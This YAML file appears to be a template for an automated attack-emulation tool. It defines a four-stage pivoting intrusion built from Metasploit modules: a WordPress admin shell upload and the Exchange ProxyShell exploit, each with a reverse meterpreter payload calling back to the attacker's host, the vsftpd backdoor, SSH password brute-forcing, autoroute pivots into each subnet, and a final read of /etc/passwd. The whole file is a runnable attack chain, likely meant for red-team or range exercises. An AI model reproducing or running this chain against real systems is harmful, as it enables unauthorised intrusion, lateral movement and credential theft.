---
# A pivoting example that first exploits a WordPress service and uses it to discover the next network.
# It repeats the same process with other services (FTP, MS Exchange, SSH) that are in different networks.

name: Pivoting example
settings:
  separator: "|"
stages:
  # Stage 1
  1-wordpress-exploitation:
    steps:
      upload-php-shell:
        is_init: true
        module: metasploit
        arguments:
          module_name: unix/webapp/wp_admin_shell_upload
          datastore:
            RHOSTS: {{ wordpress.host }}
            USERNAME: {{ wordpress.username }}
            PASSWORD: {{ wordpress.password }}
            PAYLOAD: php/meterpreter/reverse_tcp
            LHOST: {{ cryton.host }}
        next:
          - type: state
            value: finished
            step: create-route-to-network-1

      create-route-to-network-1:
        metadata:
          note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
        module: metasploit
        arguments:
          module_name: multi/manage/autoroute
          datastore:
            CMD: add
            SUBNET: {{ wordpress.subnet_ip }}
            SESSION: $upload-php-shell|session_id

  # Stage 2
  2-ftp-exploitation:
    depends_on:
      - 1-wordpress-exploitation
    steps:
      exploit-ftp-server:
        is_init: true
        module: metasploit
        # TODO: missing retries
#            retries: 3
        arguments:
          module_name: unix/ftp/vsftpd_234_backdoor
          datastore:
            RHOSTS: {{ ftp.host }}
            PAYLOAD: cmd/unix/interact
        next:
          - type: state
            value: finished
            step: create-route-to-network-2

      create-route-to-network-2:
        metadata:
          note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
        module: metasploit
        arguments:
          module_name: multi/manage/autoroute
          datastore:
            CMD: add
            SUBNET: {{ ftp.subnet_ip }}
            SESSION: $upload-php-shell|session_id

  # Stage 3
  3-msf-exchange-server-exploitation:
    depends_on:
      - 2-ftp-exploitation
    steps:
      exploit-exchange-server:
        is_init: true
        module: metasploit
        arguments:
          module_name: exploit/windows/http/exchange_proxyshell_rce
          datastore:
            RHOSTS: {{ exchange.host }}
            email: {{ exchange.email }}
            PAYLOAD: windows/x64/meterpreter/reverse_tcp
            LHOST: {{ cryton.host }}
        next:
          - type: state
            value: finished
            step: create-route-to-network-3

      create-route-to-network-3:
        metadata:
          note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
        module: metasploit
        arguments:
          module_name: multi/manage/autoroute
          datastore:
            CMD: add
            SUBNET: {{ exchange.subnet_ip }}
            SESSION: $upload-php-shell|session_id

  # Stage 4
  4-ssh-exploitation:
    depends_on:
      - 3-msf-exchange-server-exploitation
    steps:
      bruteforce-user:
        is_init: true
        module: metasploit
        arguments:
          module_name: scanner/ssh/ssh_login
          datastore:
            RHOSTS: {{ ssh.host }}
            USERNAME: {{ ssh.username }}
            PASSWORD: {{ ssh.password }}
            STOP_ON_SUCCESS: true
        next:
          - type: state
            value: finished
            step: get-passwd-file

      get-passwd-file:
        module: command
        arguments:
          session_id: $bruteforce-user.session_id
          command: cat /etc/passwd
